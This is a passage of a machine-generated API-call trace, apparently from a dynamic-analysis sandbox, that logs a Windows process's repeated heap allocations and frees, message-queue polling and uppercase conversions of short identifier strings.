RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0165.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0165.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0165.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0165.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0165.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0165.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0165.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0165.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0165.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0165.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0165.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0165.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0165.310] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0165.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0165.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0165.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0165.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0165.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0165.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0165.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0165.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0165.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0090 [0165.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0165.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0165.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0165.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0165.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0165.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0165.311] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0165.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0165.311] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0165.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0165.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95d0 [0165.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0165.311] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0165.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0165.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0165.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0165.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0165.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0165.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0165.311] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0165.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0165.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0165.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0165.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0165.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0165.312] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0165.312] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0165.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0165.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0165.312] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0165.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0165.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa340 [0165.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0165.312] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0165.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0165.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0165.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0165.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0165.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0165.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00c0 [0165.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0165.313] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0165.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0165.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0165.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0165.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0165.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0165.314] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0165.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0165.314] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0165.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0165.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0165.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0165.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0165.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0165.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0165.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0165.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0165.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0165.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0165.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0165.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0165.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0165.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0165.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0165.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0165.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0165.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0165.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0165.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0165.315] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0165.315] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0165.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0165.315] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0165.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0165.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa340 [0165.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0165.315] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0165.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0165.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0165.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0165.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0165.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0165.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0165.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0165.316] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0165.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0165.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0165.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0165.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0165.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0165.316] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0165.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0165.316] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0165.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0165.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0165.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0165.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0165.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0165.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0165.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0165.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0165.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0165.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0165.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0165.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0165.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0165.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0165.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.317] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0165.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0165.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0165.317] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0165.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0165.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0165.317] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0165.318] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0165.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0165.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0165.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0165.318] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0165.318] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0165.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0165.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0165.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0165.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0165.318] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0165.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0165.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa688 [0165.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0165.319] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0165.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0165.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0165.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0165.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0165.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0165.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0165.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0165.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0165.319] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0165.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0165.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0165.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0165.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0165.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0165.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0165.320] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0165.320] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0165.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0165.320] RtlAllocateHeap 